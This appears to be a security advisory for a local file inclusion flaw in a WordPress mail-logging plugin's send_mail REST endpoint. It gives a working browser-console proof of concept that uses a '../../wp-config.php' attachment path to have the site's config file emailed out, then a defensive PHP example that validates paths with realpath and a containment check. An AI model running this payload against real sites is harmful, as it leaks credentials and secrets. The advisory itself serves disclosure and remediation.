Description

The plugin does not properly validate file path parameters when attaching files to emails, leading to local file inclusion, and allowing an attacker to leak the contents of arbitrary files.
Run the following within any page on the site, ensuring that the `id` parameter is set to a valid ID for a log entry. Inspect the email that is sent, and see that it contains the site's `wp-config.php` file as an attachment.
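```javascript
// Fetch a REST nonce for the current session.
var nonce = await (await fetch('/wp-admin/admin-ajax.php?action=rest-nonce')).text();
// Ask the plugin to e-mail log entry `id`; the key inside includeAttachment is the file path that gets attached.
await (await fetch('/wp-json/wml/v1/wml_logs/send_mail', {method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded', 'X-WP-Nonce': nonce}, body: 'id=1&[email protected]&includeAttachment={"../../wp-config.php":1}'})).text();
```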
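
The missing check described above, as an added example (not the plugin's code or its actual fix): canonicalise each requested attachment path and keep it only if it resolves inside the intended attachment directory. The function name `filter_attachments` and the temporary directory layout are assumptions made for the illustration.

```php
<?php
// Added example; filter_attachments() and the directory layout are hypothetical.

/**
 * Return the paths from an includeAttachment-style JSON object that resolve
 * to regular files inside $baseDir. Everything else is dropped.
 */
function filter_attachments(string $json, string $baseDir): array
{
    $requested = json_decode($json, true);
    $base = realpath($baseDir);
    if (!is_array($requested) || $base === false) {
        return [];
    }
    // Trailing separator so a sibling such as "mail-old" cannot pass as a child of "mail".
    $base = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;

    $allowed = [];
    foreach ($requested as $relative => $flag) {
        if (!is_string($relative) || !$flag) {
            continue;
        }
        // realpath() collapses "../" and follows symlinks; false means no such file.
        $resolved = realpath($base . $relative);
        if ($resolved === false || !is_file($resolved)) {
            continue;
        }
        // Containment check on the canonical path, not on the raw user input.
        if (strncmp($resolved, $base, strlen($base)) !== 0) {
            continue;
        }
        $allowed[] = $resolved;
    }
    return $allowed;
}

// Constructed sample layout: <tmp>/site/wp-config.php and <tmp>/site/uploads/mail/report.txt
$site = sys_get_temp_dir() . '/wml-demo-' . bin2hex(random_bytes(4));
mkdir("$site/uploads/mail", 0700, true);
file_put_contents("$site/wp-config.php", "constructed secret\n");
file_put_contents("$site/uploads/mail/report.txt", "constructed attachment\n");

// Constructed request value: one traversal entry and one legitimate attachment.
$payload = '{"../../wp-config.php":1,"report.txt":1}';
print_r(filter_attachments($payload, "$site/uploads/mail"));
```

Checking the raw string for `../` is not sufficient on its own; the comparison has to be made on the resolved path, as done here.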